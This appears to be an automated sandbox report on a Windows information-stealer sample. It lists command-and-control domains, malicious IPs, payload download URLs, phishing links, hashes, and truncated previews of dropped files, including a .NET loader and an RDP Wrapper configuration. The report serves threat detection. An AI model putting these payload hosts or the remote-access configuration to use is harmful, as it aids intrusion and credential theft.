                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: file.exe
                                                            TimeTypeDescription
                                                            18:14:33API Interceptor5x Sleep call for process: RegAsm.exe modified
                                                            18:15:35API Interceptor1x Sleep call for process: AFHDGDGIID.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            8.46.123.33GvQcD0PvEH.exeGet hashmaliciousUnknownBrowse
                                                              exe4.bin.bak.exeGet hashmaliciousBlackMoon, GhostRatBrowse
                                                                147.45.44.104file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104/prog/66f4247d51812_lfdsjna.exe
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104/prog/66f4247d51812_lfdsjna.exe
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104/prog/66f4247d51812_lfdsjna.exe
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 147.45.44.104/prog/66f4247d51812_lfdsjna.exe
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104/prog/66f4247d51812_lfdsjna.exe
                                                                file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                                                • 147.45.44.104/malesa/66ed86be077bb_12.exe
                                                                file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                                                                • 147.45.44.104/malesa/66ed86be077bb_12.exe
                                                                jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                • 147.45.44.104/malesa/66ed86be077bb_12.exe
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                gutterydhowi.shopfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.21.4.136
                                                                SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 104.21.4.136
                                                                3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.132.32
                                                                bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.132.32
                                                                cowod.hopto.orgfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                fragnantbui.shopfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 188.114.96.3
                                                                3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                offensivedzvju.shopfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.96.3
                                                                SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 188.114.97.3
                                                                3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.96.3
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousLummaCBrowse
                                                                • 147.45.44.131
                                                                file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                                                • 147.45.44.104
                                                                https://bnbvfd.crabdance.com/clients/login.phpGet hashmaliciousUnknownBrowse
                                                                • 147.45.45.70
                                                                https://tmsm.krtra.com/c/R2QnECLcaUYf/mYo0Get hashmaliciousUnknownBrowse
                                                                • 147.45.47.98
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 147.45.44.104
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 147.45.44.104
                                                                AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                                                • 147.45.44.131
                                                                LIFELINK-ASRUfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 45.132.206.251
                                                                AS-PUBMATICUShttp://bt-105687.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 198.47.127.205
                                                                https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0Get hashmaliciousUnknownBrowse
                                                                • 185.64.191.210
                                                                https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                • 198.47.127.20
                                                                https://is.gd/fxcRirGet hashmaliciousUnknownBrowse
                                                                • 198.47.127.18
                                                                https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                • 198.47.127.19
                                                                https://mail-105280.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 198.47.127.205
                                                                https://telstra-102246.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 198.47.127.205
                                                                https://mitammakslogona.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                • 185.64.191.210
                                                                https://telstra-104752.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 198.47.127.205
                                                                https://gumenilogiz.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                                • 185.64.191.210
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://upholdxyi_login.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                http://eastlink-100612.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                https://www.filemail.com/d/qyopmnowcnooqddGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                https://url.us.m.mimecastprotect.com/s/NhduCzpA73FDm0Yhgi0C9-qzu?domain=filemail.comGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                175e4400e2e99b0d0ac35bd3fe68519fa91f9ae5cc7a7.exeGet hashmaliciousQuasarBrowse
                                                                • 188.114.96.3
                                                                Daniel Leblanc shared _Incendie Hudson._ with you. #12.emlGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                                • 188.114.96.3
                                                                https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                                                                • 188.114.96.3
                                                                51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 5.75.211.162
                                                                Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 5.75.211.162
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 5.75.211.162
                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsxGet hashmaliciousUnknownBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                http://google.comGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                https://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                                                                • 104.21.4.136
                                                                • 188.114.97.3
                                                                • 172.67.162.108
                                                                • 172.67.128.144
                                                                • 104.21.36.139
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 172.67.208.139
                                                                37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 104.102.49.254
                                                                e.dllGet hashmaliciousDridex DropperBrowse
                                                                • 104.102.49.254
                                                                e.dllGet hashmaliciousDridex DropperBrowse
                                                                • 104.102.49.254
                                                                Payment copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 104.102.49.254
                                                                Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                                • 104.102.49.254
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Program Files\RDP Wrapper\rdpwrap.dllsmss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse
                                                                  CVE-2024-38143 poc.exeGet hashmaliciousCodoso Ghost, UACMeBrowse
                                                                    LisectAVT_2403002A_44.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                      6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                        234880953-042446-sanlccjavap0003-3849.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                          YQR4CA11sP.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                            jYHfnNP0MN.exeGet hashmaliciousAveMaria, Blank Grabber, PrivateLoader, UACMeBrowse
                                                                              Filezillawin_94199_patched.exeGet hashmaliciousUnknownBrowse
                                                                                PO7431.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                                  RDPWInst-v1.6.2.msiGet hashmaliciousUnknownBrowse
                                                                                    Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):116736
                                                                                    Entropy (8bit):5.884975745255681
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                                    MD5:461ADE40B800AE80A40985594E1AC236
                                                                                    SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                                    SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                                    SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 54%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: smss.exe, Detection: malicious, Browse
                                                                                    • Filename: CVE-2024-38143 poc.exe, Detection: malicious, Browse
                                                                                    • Filename: LisectAVT_2403002A_44.exe, Detection: malicious, Browse
                                                                                    • Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse
                                                                                    • Filename: 234880953-042446-sanlccjavap0003-3849.exe, Detection: malicious, Browse
                                                                                    • Filename: YQR4CA11sP.exe, Detection: malicious, Browse
                                                                                    • Filename: jYHfnNP0MN.exe, Detection: malicious, Browse
                                                                                    • Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse
                                                                                    • Filename: PO7431.exe, Detection: malicious, Browse
                                                                                    • Filename: RDPWInst-v1.6.2.msi, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                    File Type:Generic INItialization configuration [SLPolicy]
                                                                                    Category:dropped
                                                                                    Size (bytes):443552
                                                                                    Entropy (8bit):5.4496544667416975
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                                                    MD5:92BC5FEDB559357AA69D516A628F45DC
                                                                                    SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                                                    SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                                                    SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                                                    Malicious:false
                                                                                    Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):73216
                                                                                    Entropy (8bit):7.6619916056452
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
                                                                                    MD5:8C46913FBA5CA6A0CB8C4E839EF3A3AE
                                                                                    SHA1:95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
                                                                                    SHA-256:1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
                                                                                    SHA-512:B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\AFHDGDGIID.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................("...*..(....*6.|.....(0...*Vs1...r...p(....(2...*Js1....s3....(4...*Zr...p(....(.....oE...*..(N...:....*r...p(.....r&..p(....(O...(....*.r...p(....(....r...p(....oE...:....r...p(....*r...p(....*.rM..p(.....{....rM..p(....(R...oS...(T...*b.:....r...p(....*.oU...*.0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+...*...0../.........(....}
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):9571
                                                                                    Entropy (8bit):5.536643647658967
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                    Malicious:false
                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):5242880
                                                                                    Entropy (8bit):0.037963276276857943
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):32768
                                                                                    Entropy (8bit):0.017262956703125623
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                    Malicious:false
                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):49152
                                                                                    Entropy (8bit):0.8180424350137764
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                    Malicious:false
